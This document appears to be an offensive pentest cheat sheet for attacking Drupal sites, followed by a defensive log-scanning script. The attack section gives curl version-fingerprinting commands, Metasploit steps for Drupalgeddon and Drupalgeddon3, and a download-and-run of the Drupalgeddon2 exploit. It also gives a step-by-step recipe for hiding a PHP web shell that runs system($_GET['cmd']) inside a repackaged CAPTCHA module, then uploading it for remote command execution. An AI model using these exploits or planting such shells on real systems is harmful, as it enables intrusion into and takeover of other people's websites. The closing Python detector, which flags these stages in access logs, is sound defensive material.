Version

curl -s "http://$target/CHANGELOG.txt"
curl -s "http://$target/" | grep -i drupal
  • 7.0 up to 7.31, use Drupalgeddon
  • Below 7.58 and 8.5.1, use Drupalgeddon2
  • Various 7.x and 8.x, use Drupalgeddon3

RCE

Drupalgeddon

Version: 7.0 up to 7.31

Pre-authenticated

msfconsole
use exploit/multi/http/drupal_drupageddon
show options

Drupalgeddon2

Version: below 7.58 and 8.5.1

Insufficient input sanitization during user creation

curl -s https://www.exploit-db.com/raw/44448 -o drupalgeddon2.py
# Change the exploit yourself
python3 ./drupalgeddon2.py

Drupalgeddon3

Version: Various 7.x and 8.x

Need to be logged into a user that can delete a node

msfconsole
use exploit/multi/http/drupal_drupageddon3
show options

Install custom php

Go to drupal.org and download a module, like CAPTCHA

wget https://ftp.drupal.org/files/projects/captcha-2.0.9.tar.gz
tar xvf captcha-2.0.9.tar.gz
# use the explicit directory name: a bare "captcha*" also matches the .tar.gz and makes cd fail
cd captcha-2.0.9
echo '<?php system($_GET["cmd"]); ?>' > shell.php
vim .htaccess

Write this into .htaccess

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

Compress the directory again

cd ..
# -z actually gzips the archive; name the directory explicitly so the original download is not bundled in
tar czvf captcha.tar.gz captcha-2.0.9/

Browse to /admin/reports/updates/install, or /admin/modules/install, and upload our .tar.gz module. Sometimes these paths do not exist.

After doing all that, browse to http://$target/modules/captcha/shell.php?cmd=<command> to do RCE
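From the defender's side, the three stages of the module-upload route above leave distinct traces in the web server access log: a 200 for CHANGELOG.txt, a POST to one of the installer paths, and a .php file requested directly under /modules/ with a cmd parameter. The following detection script is an added example (not part of the original notes); the log lines it parses are constructed in combined log format, and the labels and thresholds are my own choices.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Module installer endpoints named in the notes above
INSTALL_PATHS = {"/admin/reports/updates/install", "/admin/modules/install"}

# Constructed sample log: one client runs the full chain, another browses normally
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /CHANGELOG.txt HTTP/1.1" 200 1234
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /user/login HTTP/1.1" 200 5678
203.0.113.5 - - [10/Oct/2023:14:02:10 +0000] "POST /admin/modules/install HTTP/1.1" 302 0
203.0.113.5 - - [10/Oct/2023:14:03:44 +0000] "GET /modules/captcha/shell.php?cmd=id HTTP/1.1" 200 57
198.51.100.7 - - [10/Oct/2023:14:05:00 +0000] "GET /node/1 HTTP/1.1" 200 9000
"""


def classify(line):
    """Return (ip, label, detail) if the request matches one of the three stages, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, status = m["ip"], m["method"], int(m["status"])
    url = urlsplit(m["path"])
    path, query = url.path, parse_qs(url.query)
    # Stage 1: version fingerprinting. Only a served (200) CHANGELOG.txt leaks the version.
    if path == "/CHANGELOG.txt" and status == 200:
        return (ip, "version-fingerprint", path)
    # Stage 2: an archive pushed through the admin module installer.
    if method == "POST" and path in INSTALL_PATHS:
        return (ip, "module-upload", path)
    # Stage 3: a .php file fetched directly from a module directory; contributed modules
    # do not normally expose PHP entry points, and a cmd= parameter makes it near certain.
    if "/modules/" in path and path.endswith(".php"):
        detail = path + (" cmd=" + query["cmd"][0] if "cmd" in query else "")
        return (ip, "webshell", detail)
    return None


def scan(log_text):
    """Run classify over every line and keep the hits, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, label, detail in scan(SAMPLE_LOG):
        print(f"{ip:15} {label:20} {detail}")
```

Correlating all three labels from one source address within a short window is a much stronger signal than any single hit; a lone CHANGELOG.txt request is common scanner noise.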